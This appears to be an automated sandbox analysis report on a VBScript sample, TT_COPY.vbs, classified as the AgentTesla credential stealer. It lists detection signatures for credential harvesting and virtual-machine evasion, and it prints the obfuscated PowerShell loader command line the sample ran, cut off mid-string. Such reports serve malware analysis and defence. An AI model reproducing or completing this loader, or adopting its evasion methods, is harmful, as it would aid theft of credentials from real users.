Edit tour
Windows
Analysis Report
TT_COPY.vbs
Overview
General Information
Detection
AgentTesla
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected AgentTesla
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64native
- wscript.exe (PID: 9204 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\TT_CO PY.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1) - powershell.exe (PID: 2556 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Vildmnd = """SaFLau ConFacGatU niStoUnnLi suSSemLee AurGltIneF rnAnsFrbAn aCarIrnPrs re0St To{C h Ir Al Ud DopCoaSer UsaPemAn(T h[FoSRetHo rKoiBonSag Su]In`$NoR AfenoguniH yoOpnMesHa pFrlInathn StlVaoIsvU nsel)Bo;Hu In Po Fe Fo`$DiDOce WilMuiUnnP htBaeHerJu vSyaNalPrl GaeTorKonI feCosDi No =Br WhNBee trwKo-FjOK obThjRaeLe cCotUn Beb StyEntCieK o[cu]Hu Cr (Hy`$mrRDr eOagviiMyo BanTvsKvpE klOvaacnFr lSloHovsos Pi.SuLAbeN enWagSmtHu hTh No/Be Ze2Co)St;P e Sk Gt Mi SuFUdomer Om(cr`$ArK UblVaiOvsS etUnrEmiAz nTeggeeUnr Gu=Al0re;U n Tr`$SpKT jlDriMesAk tSurFoiUnn CagMeeSarI c He-FalBr tKa Ac`$Ti RWieUdgUdi DeoRanObsS kpRelMiaPr nAnlreoAlv Insfo.BoLT reFanPrgFr tSthDd;Uu Sp`$SyKFol GoiAlsExti nrTriLinUn gSkeIcrRe+ Fl=Zi2he)L e{Ga Ys Un Pa Pr Te Ta Il Af`$ TrDBreNolF oiSenFotCa eBrrduvPea ArlMulIneT rrFonSheHy sSa[Re`$Re KOmlPaiDas TrtBurOrit enVegDoeDi rOp/Sw2Be] Em Gk=Lo C o[PocOnoSu nTivUneMar KrtTa]Vi:t r:WiTReoRo BVgyEttWae De(Ma`$GrR WheFogTuiA noNonBysDi pLolDeaFon PrlUdoFovG rsUn.PaSFo ucobDusBrt ForCliMenT ugli(Ja`$C eKMelIciAy sAftMirGri CinUvgUneS trSe,Fu te 2Ho)Ko,Sk Ba1Ti6Va)F l;Ga Va Ar `$UnDSceKe lPiirenFlt peeDorTevS taColFjlTr ePerAcnOve DisLa[Ca`$ AfKtalIdiK lsCotskrHy iUnnBrgsue Asrte/Mo2P e]Le Zo=Mi Ne(ne`$Pi DsleaulSui FanmytFjeA nrFevTeaPr lnolKreLur FrnByeThsO b[Ek`$BaKU dltriOrsLa tserOsiChn JegSkeThrS p/Er2Mu]Bi Be-prbmex imoForGr E s1Sk6St5Fr )De;Ar kn Gi An Ma}H e Vn[ReSGa takrHaiSin LogOx]fi[T aSmoyCosHa tPaeChmOr. unTAleAbxO vtFo.ExEkv nNocAaoMed StiHonAsgB o]No:Bi:Ti ADiSBeCGrI LaIHu.raGC oeVitKoSVa tprrUniLan SugHa(Ec`$ MaDExeKvlF aiFlnBatEn ePorssvFua JalInlIneG orExnBieWh sAn)Eq;Pa} St`$RiFUpo KorsksInkM inVeiFanDu gMesrerLie BrsOvuRelH otIdaUrtDi eKtrDesfa0 In=SiSHimU fecergotaf ePrnknsvib HeaHyrEknm issi0Fi Dr 'MeFSv6AfD SnCfaDSu6S uDVe1InCHj 0AfCUn8Da8 UdBBvCMa1B aCre9VaCOr 9Sa'Un;Al` $LiFodoKer HosLikConH uiTrnSpgDo slarSueEjs TeuTelVetB iaGrtReeOv ransLe1Wa= OuSLumMoeU rrBrtUmeKa nHyspobMua WirInnAnsN o0Br No'Ud EAn8KoCRuC UnCdo6TrDW o7cuCcuAFa Dha6LyCDiA UnCNe3KrDC a1ma8FlBIm FDi2DdCDyC SaCGrBSe9A m6Ch9Ok7Re 8grBskFhu0 ReCFiBMoDD i6NaCCo4Sk CUn3HiCBr0 KeETrBPoCS h4GrDRe1An CBoCYnDSo3 MiCAf0SaEU n8SaCTo0Ti DCo1ScCZoD NoCFlAMeCu t1KoDSe6Bo 'Sq;Gr`$Fi FDooStrnos KokIdnCoib lnSkgJosSp rDaeTssTeu UnlSttSvaP rtHoeChrHy sDi2Ny=PoS UmmPeeKnrq utCleHonid sFobFoaPrr UnnKosPo0R a Ve'TrEPa 2ImCRe0spD pr1VaFCa5T eDPa7lyCBr AHeCSi6DiE Ir4VaCFr1D aCVa1UpDDu 7TeCGy0hoD Re6UdDSu6D e'Me;Ud`$G rFTeolerLu sCukClnRai SanHagcisC yrBeeDesVa uSylFotSka AntmueSarU dsEt3La=Ra SStmEkeSkr SatHueSunT rsInbBeaHe rRonFosKu0 He Co'FrFR e6slDMeCFo Din6BeDOp1 ToCBu0CoCU l8Gu8MeBUn FCo7OpDMo0